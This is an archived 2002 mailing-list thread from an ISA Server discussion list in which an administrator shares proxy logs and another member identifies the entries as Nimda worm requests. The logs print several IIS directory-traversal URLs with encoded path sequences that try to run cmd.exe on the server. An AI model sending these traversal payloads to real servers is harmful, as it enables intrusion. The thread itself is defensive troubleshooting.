Re: ISA logs.
- From: Vinaykumar G <G.Vinay@xxxxxxxxx>
- To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
- Date: Wed, 27 Feb 2002 22:37:29 -0800
Hi JIm
I did not find these kind of entries in IIS logs and in ISA logs for
other entries I find
the source address as 10.3.x.x which is my INternal Network but for these
entries containing the Scripts I find the Ip
address coming from 202.x.x.x which are valid on the INternet, so iam
getting these requests from Internet to my ISA.
Is someone trying to send these scripts to My IIS behind ISA? I have scanned
IIS and other servers of my network for Nimda but did not find anything.
Regards,
vinay.
-----Original Message-----
From: Jim Harrison [mailto:jim@xxxxxxxxxxxx]
Sent: Tuesday, February 26, 2002 8:03 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] Re: ISA logs.
http://www.ISAserver.org
Those are Nimda requests.
Since the sc-result code is 401 for all of them, it appears that ISA may be
allowing them to pass.
"401" could be coming from ISA or the IIS service.
What entries do you find in the IIS logs?
Jim Harrison
MCP(NT4, W2K), A+, Network+, PCG
http://isaserver.org/authors/harrison/
Read the books!
----- Original Message -----
From: "Vinaykumar G" <G.Vinay@xxxxxxxxx>
To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
Sent: Sunday, February 24, 2002 19:44
Subject: [isalist] ISA logs.
http://www.ISAserver.org
Hi Jim,
This is what iam getting in the ISA logs and I have denoted
xxx.xxx.xx.xx is pointing some valid IP on the Internet. Then if the IP is
valid one on the Internet then these scripts are coming from internet.
Please confirm as what has to be done to stop these scripts being executed.
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:04
w3proxy ISA - www - - - 145 3518 http
TCP GET
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
./winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:06
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:08
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
- - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N 2002-02-23 05:57:08 w3proxy
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:10
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
- - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N 2002-02-23 05:57:11 w3proxy anonymous
- N 2002-02-23 05:57:11 w3proxy ISA - www
- - - 97 3518 http TCP GET
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - -
401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:13
w3proxy ISA - www - - - 98 3518 http
TCP GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:15
w3proxy ISA - www - - - 96 3518 http
TCP GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
-
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:17
w3proxy ISA - www - - - 100 3518 http
TCP GET
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - -
401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:19
w3proxy ISA - www - - - 96 3518 http
TCP GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
Regards,
vinay.
------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
jim@xxxxxxxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub')
------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
g.vinay@xxxxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub')
Other related posts:
